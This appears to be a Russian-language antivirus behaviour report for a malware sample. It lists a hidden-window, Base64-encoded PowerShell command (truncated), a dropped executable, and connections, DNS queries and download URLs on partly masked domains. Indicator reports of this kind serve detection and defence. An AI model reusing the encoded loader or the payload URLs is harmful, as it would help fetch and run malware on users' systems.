Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABMAGwAZABsAGsANQB0AD0AKAAoACcAVAAnACsAJwBoAG0AZwAyACcAKQArACcAaQB3ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBwAHIAbwBGAEkAbABFAFwARQBwADEAcwA4AFUAVgBcA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1432
- %TEMP%\987860.cvr
- %HOMEPATH%\ep1s8uv\cdc8b6u\m5km4176.exe
- %HOMEPATH%\ep1s8uv\cdc8b6u\m5km4176.exe
- 'ge####rhouse.com':80
- 'am####tchell.com':80
- 'am####tchell.com':443
- 'fo####a###ytics.net':80
- 'st#####productions.com':80
- 'st#####productions.com':443
- 'ri###utra.com':80
- 'ri###utra.com':443
- 'ju####scott.com.au':80
- http://ge####rhouse.com/cgi-bin/LAb1/
- http://am####tchell.com/themes/w/
- http://fo####a###ytics.net/images/57A7/
- http://st#####productions.com/squad/3aV6xrH/
- http://ri###utra.com/img/wOMENgh/
- http://ju####scott.com.au/sites/rRS/
- 'am####tchell.com':443
- 'st#####productions.com':443
- 'ri###utra.com':443
- DNS ASK ge####rhouse.com
- DNS ASK am####tchell.com
- DNS ASK fo####a###ytics.net
- DNS ASK ko##can.com
- DNS ASK st#####productions.com
- DNS ASK ri###utra.com
- DNS ASK ju####scott.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABMAGwAZABsAGsANQB0AD0AKAAoACcAVAAnACsAJwBoAG0AZwAyACcAKQArACcAaQB3ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBwAHIAbwBGAEkAbABFAFwARQBwADEAcwA4AFUAVgBcA... (со скрытым окном)